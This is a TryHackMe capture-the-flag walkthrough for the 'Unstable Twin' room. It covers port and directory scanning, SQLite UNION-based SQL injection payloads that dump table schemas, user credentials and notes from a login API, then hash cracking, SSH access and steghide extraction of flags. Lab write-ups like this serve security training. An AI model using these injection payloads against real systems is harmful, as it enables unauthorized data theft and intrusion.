TryHackMe solution: Unstable Twin


#1 “What is the build number of Vincent’s server?

Use nmap:

nmap -sCV

Use dirsearch:

python3 -u


View the response and we can see a header: Build Number

#2 “Is this the only build? (Yay/Nay)

Resend the request to /info and view the header again.

#3 “How many users are there?
#4 “What colour is Vincent?

We will test api login:

If we use the wrong credential, we have:

Test for SQL injection:

We get a message:

So the login function is vulnerable to SQL injection. We will know the version of the database with payload:

' union select sqlite_version(),null-- 

The server returns:

Name all the tables:

' union select name,null from sqlite_master where type='table'-- 

Name all the columns:

' union select sql,null from sqlite_master where tbl_name='users' and type='table'-- 

Get all accounts with:

' union select username,password from users -- 
#5 “What is Mary Ann’s SSH password

Enumerate the database. Get all columns in notes with:

' union select sql,null from sqlite_master where tbl_name='notes' and type='table'-- 

Get all the notes with:

' union select cast(user_id as text),notes from notes-- 

And we have Mary Ann’s password:


We can crack the hash with CrackStation.

#6 “User Flag

Connect to ssh:

ssh mary_ann@

And we have the flag.

#7 “Final Flag

We have a note in server_notes.txt.

So we need to find these images. And I found them in /opt/unstabletwin/.

Read two .py files.

So we can get the image when accessing:

If we get nothing, refresh the page and we will have the image.

After getting all the images, we can extract them with:

steghide extract -sf marnie.jpeg

Then we have 5 text files. Read mary_ann.txt we have:

You need to find all my children and arrange in a rainbow!

Concat 4 strings in the order of: Red – Orange – Yellow – Green


This is a base62 string, we can decode it with Base62 Decode Online Tool.

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